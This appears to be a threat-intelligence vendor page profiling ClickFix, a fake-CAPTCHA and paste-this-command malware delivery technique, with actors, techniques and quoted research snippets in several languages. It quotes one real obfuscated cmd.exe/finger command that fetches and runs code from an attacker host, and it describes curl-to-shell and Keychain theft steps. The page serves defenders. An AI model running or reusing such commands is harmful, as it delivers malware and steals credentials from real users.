ClickFix is an exploit-less social-engineering initial-access technique and associated malware-delivery ecosystem, not a single malware family. It uses fraudulent CAPTCHA, browser-update, technical-support, meeting, document-access, or error-remediation interfaces to induce victims to copy and execute attacker-controlled commands. Lures commonly place commands in the clipboard and instruct victims to paste them into Windows Run, Windows Terminal, PowerShell, macOS Terminal, Linux shells, or other trusted execution surfaces such as File Explorer. The commands typically download or execute follow-on payloads, frequently abusing legitimate system utilities to reduce detection opportunities.
ClickFix is delivered through compromised websites, watering-hole operations, phishing, malvertising, SEO poisoning, and impersonated business or collaboration workflows. Operators increasingly use operating-system-aware lures, per-visitor obfuscated commands, traffic filtering, and backend services that dynamically generate commands or retrieve payload configuration. Some campaigns use blockchain-based dead drops to rotate next-stage infrastructure without modifying compromised sites.
The technique is used by financially motivated operators and state-linked groups, including campaigns associated with APT28, MuddyWater, Kimsuky, BlueNoroff, and traffic-distribution activity tracked as TA2726. ClickFix campaigns have targeted consumer and enterprise users across North America, Europe, and the Middle East, including government, financial services, education, transportation, cryptocurrency, and Web3 organizations. Payloads vary by operation and have included infostealers, loaders, remote-access trojans, and post-exploitation tooling. ClickFix activity affects Windows, macOS, and Linux systems.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
1 CVE Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The attackers used the Ghost CMS vulnerability to tamper with website articles by appending malicious JavaScript loaders to the bottom of pages. These loaders were designed to support ClickFix attacks — a growing social engineering tactic that tricks users into manually executing malware on their systems. | A critical Ghost CMS vulnerability identified as CVE-2026-26980 has been exploited in a widespread cyber campaign that compromised more than 700 websites... The Ghost CMS vulnerability is an SQL injection flaw affecting Ghost’s Content API.
9 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Jumpsec said in a report shared with Cyber Security News (CSN) that the kit impersonates Zoom and Teams meetings while quietly profiling wallets and guiding victims into a ClickFix paste step.
Jumpsec said in a report shared with Cyber Security News (CSN) that the kit impersonates Zoom and Teams meetings while quietly profiling wallets and guiding victims into a ClickFix paste step.
title : ClickFix to EtherHiding description : A single pasted command that ran all the way to a Python RAT reading its C2 off the Ethereum blockchain.
ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake "prove you're human" pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise.
ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake "prove you're human" pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise.
ClickFix, the trick that fools people into running malware by hand, has quietly grown a back office. New research shows the malicious commands behind its fake "prove you're human" pages are now handed out by API-driven servers that give each visitor the same malware in a different disguise.
31 distinct techniques documented for this family, organized by ATT&CK tactic.
Victims are tricked into executing a crafted command that initiates PowerShell, spawns cmd.exe via WMI, and mounts a remote WebDAV share.
Une tâche planifiée maintient la communication C2 via deno.exe exécutant un JavaScript distant.
Overlay ClickFix : pour tous les autres visiteurs, affichage d’une fausse page de vérification humaine incitant à copier-coller et exécuter une commande malveillante dans leur terminal.
Пользователю предлагают открыть окно «Выполнить» в Windows и вставить туда PowerShell-команду; команда загружает и запускает финальный пейлоад.
cmd.exe /c s^t^a^r^t "" /min for /f "delims=@" %o in ('finger NriTDRRnWE@finger.claudeam.com') do %o
The real action is a curl request to genomicsforge[.]com that downloads and immediately pipes a shell script to zsh.
Код собирается прямо в памяти браузера и динамически выполняется через добавление в элемент head DOM.
Via osascript, the attacker can read files, access the macOS Keychain, capture screenshots, and automate GUI apps to export saved passwords.
Пользователю предлагают открыть окно «Выполнить» в Windows и вставить туда PowerShell-команду. Если жертва следует инструкции, команда загружает и запускает финальный пейлоад.
Le malware f.js [...] affich[ait] une fausse page de vérification humaine incitant à copier-coller et exécuter une commande malveillante dans leur terminal.
Carets are inserted between every character of start, finger, and the domain, so neither the command name nor finger.claudeam.com exists as a contiguous string anywhere in the command line.
Загруженный со взломанного сайта скрипт показывает посетителю поддельную CAPTCHA.
Every executable in the chain is either signed by Microsoft and already on the box (cmd, finger, taskkill, curl, tar) or legitimately signed open-source software downloaded from GitHub
Une tâche planifiée maintient la communication C2 via deno.exe exécutant un JavaScript distant.
Стейджер использует для передачи данных WebRTC... обмен данными с атакующими начинается без полноценного WebRTC-хендшейка. Рекомендуется отслеживать нестандартный UDP-трафик, связанный с WebRTC.
Скрипт обращается к RPC-эндпоинтам BSC Testnet и получает из смарт-контракта данные для следующей стадии атаки. Такая техника известна под названием EtherHiding.
566 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
76 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Mécanisme de leurre intégré à f.js : une superposition imitant une vérification humaine pousse la victime à copier-coller puis exécuter une commande malveillante dans un terminal.
A trusted-intermediary abuse technique/family that tricks users or other trusted workflows into executing attacker-controlled commands, transferring malicious artifacts, or authorizing attacker access across security boundaries. Variants extend from command execution to workflow abuse, identity compromise, and conceptual AI-agent manipulation.
ClickFix is described as the social-engineering/infection technique used to lure users into executing a malicious PowerShell command from the clipboard, initiating the intrusion chain.
A socially engineered malware delivery scheme/loader variant that tricks victims into executing a crafted command, launches PowerShell and cmd.exe via WMI, mounts a remote WebDAV share, retrieves payloads over CDN-backed HTTPS infrastructure, and executes a malicious DLL with rundll32.exe.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.